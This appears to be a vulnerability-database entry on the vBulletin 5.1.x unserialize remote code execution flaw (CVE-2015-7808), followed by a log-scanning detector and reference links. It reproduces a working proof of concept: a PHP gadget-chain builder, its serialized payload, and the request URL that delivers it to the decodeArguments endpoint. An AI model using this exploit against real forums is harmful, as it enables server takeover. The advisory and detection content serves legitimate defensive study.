vBulletin Arbitrary Code Execution Vulnerability

Vulnerability ID: 1123090    Vulnerability type: Input validation
Published: 2015-11-05    Updated: 2020-08-24
CVE: CVE-2015-7808    CNNVD ID: CNNVD-201511-131
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/38629
https://cxsecurity.com/issue/WLB-2015110108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201511-131
|Vulnerability details
vBulletin is an open-source commercial Web forum application developed jointly by Internet Brands and vBulletin Solutions (USA). In vBulletin versions 5.1.4 through 5.1.9 the ‘unserialize’ call in the decodeArguments method is vulnerable because the application's API does not verify the origin of Ajax requests. An unauthenticated remote attacker can exploit this by injecting a specially crafted object through the ‘$args’ variable, thereby calling any public method of the vB_Api class and executing arbitrary PHP code on the server.
|Vulnerability EXP
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE : 
# I did not discover this exploit, leaked from the IoT.

# Build the object: a serialized vB_dB_Result whose 'db' property holds a
# vB_Database with a caller-chosen 'free_result' callback (the gadget chain).
php << 'eof'
<?php
class vB_Database {
    // Stand-in for the real class: its 'functions' table maps operation
    // names to callable names, and the real free_result() calls the entry
    // stored under 'free_result'.
    public $functions = array();

    public function __construct()
    {
        $this->functions['free_result'] = 'phpinfo';
    }
}

class vB_dB_Result {
    // Property names and visibility must match the real class; protected
    // properties serialize with the "\0*\0" prefix seen in the output below.
    protected $db;
    protected $recordset;

    public function __construct()
    {
        $this->db = new vB_Database();
        $this->recordset = 1;
    }
}

// URL-encode so the NUL bytes of the protected-property markers survive.
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

# Then hit decodeArguments with your payload:
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
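Detection-side addition for the endpoint and payload shape described above (example code written for this page, not part of the original PoC or of vBulletin): a Python scan over web-server access logs that flags every request to the decodeArguments endpoint and lists the PHP classes a serialized `arguments` value would instantiate. The log lines are constructed samples, and the class-name check works for any PHP-serialized payload, not only the vB_dB_Result chain shown here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not real traffic): the first
# carries the serialized vB_dB_Result/vB_Database object from the PoC above,
# the second is ordinary browsing, the third sends a plain serialized array.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Nov/2015:10:12:01 +0000] "GET /vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D HTTP/1.1" 200 5120
10.0.0.7 - - [05/Nov/2015:10:13:44 +0000] "GET /vbforum/forum/general HTTP/1.1" 200 8876
10.0.0.9 - - [05/Nov/2015:10:15:02 +0000] "GET /vbforum/ajax/api/hook/decodeArguments?arguments=a%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22foo%22%3B%7D HTTP/1.1" 200 310
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) HTTP/')
# PHP serialized object header: O:<len>:"<class>":<nprops>:{
PHP_OBJECT_RE = re.compile(r'O:(\d+):"([^"]*)":\d+:\{')


def php_object_classes(payload):
    """Return the class names of every object header in a PHP-serialized
    string, in order of appearance. Only headers whose declared length
    matches the class name are counted, so text inside string values that
    merely resembles a header is ignored."""
    return [name for length, name in PHP_OBJECT_RE.findall(payload) if int(length) == len(name)]


def scan_log(text):
    """One finding per request to the decodeArguments endpoint: the client
    address, the classes the payload would instantiate, and a severity."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/ajax/api/hook/decodeArguments"):
            continue
        # parse_qs percent-decodes the value, so %00%2A%00 becomes the
        # "\0*\0" protected-property marker and O%3A becomes "O:".
        args = parse_qs(url.query).get("arguments", [""])[0]
        classes = php_object_classes(args)
        findings.append({"ip": m.group("ip"), "classes": classes,
                         "severity": "high" if classes else "medium"})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Any hit on this endpoint from an unpatched 5.1.4 to 5.1.9 install deserves a look, but a payload that instantiates objects is the one that reaches the gadget chain.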
|References

Source: packetstormsecurity.com
Link: http://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.html
Source: blog.checkpoint.com
Link: http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/
Source: EXPLOIT-DB
Link: https://www.exploit-db.com/exploits/38629/
Source: www.rapid7.com
Link: http://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_unserialize
Source: pastie.org
Link: http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq
Source: blog.sucuri.net
Link: https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html
Source: NSFOCUS
Name: 31510
Link: http://www.nsfocus.net/vulndb/31510